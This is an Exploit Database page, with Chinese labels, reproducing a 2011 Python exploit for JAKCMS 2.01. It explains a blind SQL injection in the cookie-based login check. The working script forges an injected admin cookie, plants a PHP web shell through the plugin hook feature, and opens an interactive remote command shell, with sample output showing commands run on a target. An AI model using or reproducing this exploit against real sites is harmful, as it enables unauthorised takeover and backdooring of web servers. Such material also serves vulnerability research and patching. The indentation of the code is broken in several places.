JAKCMS 2.01 – Code Execution

• Exploit Database
• 18 阅读

• 作者： mr_me
  日期： 2011-02-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16200/

• #!/usr/bin/python
  #
  # JAKCMS <= v2.01 Code Execution Exploit
  # Explanation:
  #
  # During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in.
  # This process is done by validating the cookies set in the browser as 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS'. If the cookies
  # are found to be set, then an SQL statement is executed to help validate if the user is logged in. This functionaility contains
  # a blind SQL Injection vulnerability, triggerable through both the 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS' variables.
  #
  # If a valid query is provided and it returns a result set, then the user is granted access to the administrative console by setting
  # the session variable 'JAKLoggedIn' to true. Below is a snippet of code from the 'class/class.userlogin.php' page on lines 65-76
  # highlighting the vulnerable code.
  #
  # public static function jakChecklogged()
  # {
  #global $jakdb;
  #if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {
  # $sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$
  # $result = $jakdb->query($sql);
  # if ($jakdb->affected_rows > 0) {
  #$row = $result->fetch_assoc();
  #$_SESSION['JAKLoggedIn'] = true;
  #
  # Additionally, functionality in the backend, allows an administrative user to add a "php_hook" whereby adding php content to a
  # page on the website. This allows an attacker essentially backdoor the website in a single request.
  #
  # [mr_me@pluto jak]$ python jakcmsCodeExecution.py -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/
  #
  #	| ------------------------------------------- |
  #	| JAKcms <= v2.01 0day Code Execution Explo!t |
  #	| by mr_me - net-ninja.net ------------------ |
  #
  # (+) Testing proxy @ localhost:8080.. proxy is found to be working!
  # (+) Targeting http://192.168.1.7/
  # (!) Exploit working!
  # (+) Entering interactive remote console (q for quit)
  #
  # mr_me@192.168.1.7# id
  # uid=33(www-data) gid=33(www-data) groups=33(www-data)
  # 
  # mr_me@192.168.1.7# uname -a
  # Linux steven-desktop 2.6.32-28-generic #55-Ubuntu SMP Mon Jan 10 21:21:01 UTC 2011 i686 GNU/Linux
  # 
  # mr_me@192.168.1.7# q 
  
  import sys
  import urllib
  import re
  import urllib2
  import getpass
  import base64
  from optparse import OptionParser
  
  usage = "./%prog [<options>] -t [target] -d [directory]"
  usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/"
  
  parser = OptionParser(usage=usage)
  parser.add_option("-p", type="string",action="store", dest="proxy",
  help="HTTP Proxy <server:port>")
  parser.add_option("-t", type="string", action="store", dest="target",
  help="The Target server <server:port>")
  parser.add_option("-d", type="string", action="store", dest="dirPath",
  help="Directory path to the CMS")
  
  (options, args) = parser.parse_args()
  
  def banner():
  	print "\n\t| -------------------------------------- |"
  	print "\t| JAKcms <= v2.01 Code Execution Explo!t |"
  	print "\t| by mr_me - net-ninja.net ------------- |\n"
  
  if len(sys.argv) < 5:
  banner()
  parser.print_help()
  sys.exit(1)
  
  def testProxy():
  	check = 1
  	sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
  	sys.stdout.flush()
  	try:
  	req = urllib2.Request("http://www.google.com/")
  		req.set_proxy(options.proxy,"http")
  		check = urllib2.urlopen(req)
  	except:
  	check = 0
  	pass
  	if check != 0:
  	sys.stdout.write("proxy is found to be working!\n")
  	sys.stdout.flush()
  	else:
  	print "proxy failed, exiting.."
  	sys.exit(1)
  
  def interactiveAttack():
  print "(+) Entering interactive remote console (q for quit)\n"
  hn = "%s@%s# " % (getpass.getuser(), options.target)
  preBaseCmd = ""
  while preBaseCmd != 'q':
  preBaseCmd = raw_input(hn)
  cmd64 = base64.b64encode(preBaseCmd)
  cmdResp = getServerResponse(options.target + options.dirPath + "index.php?p=sitemap&lol=" + cmd64, "", "")
  		result = cmdResp.split("<!DOCTYPE html")[0]
  		print result
  
  def getServerResponse(exploit, header=None, data=None):
  	try:
  		if header != None:
  			headers = {}
  			headers['Cookie'] = header
  		if data != None:
  			data = urllib.urlencode(data)
  		req = urllib2.Request("http://"+exploit, data, headers)
  		if options.proxy:
  			req.set_proxy(options.proxy,"http")
  		check = urllib2.urlopen(req).read()			
  	except urllib.error.HTTPError, error:
  		check = error.read()
  	except urllib.error.URLError:
  		print "(-) Target connection failed, check your address"
  		sys.exit(1)
  	return check
  
  def doEvilRequest():
  	print "(+) Targeting http://%s/" % (options.target)
  	phpShell = "system(base64_decode($_GET['lol']));"
  	req = options.target + options.dirPath + "admin/index.php?p=plugins&sp=newhook"
  	funnycookie = "JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin\"))+and+1=1--+;"
  	data = {'jak_name':'lol', 'jak_hook':'php_sitemap', 'jak_plugin':'0', 'jak_exorder':'1', 'jak_phpcode': phpShell}
  	check = getServerResponse(req, funnycookie, data)
  
  	if re.search("Successful", check):
  		print "(!) Exploit working!"
  		interactiveAttack()
  	else:
  		print "(-) Exploit failed, exiting.."
  		sys.exit(1)
  
  def main():
  	banner()
  	if options.proxy:
  		testProxy()
  	doEvilRequest()
  
  if __name__ == "__main__":
  	main()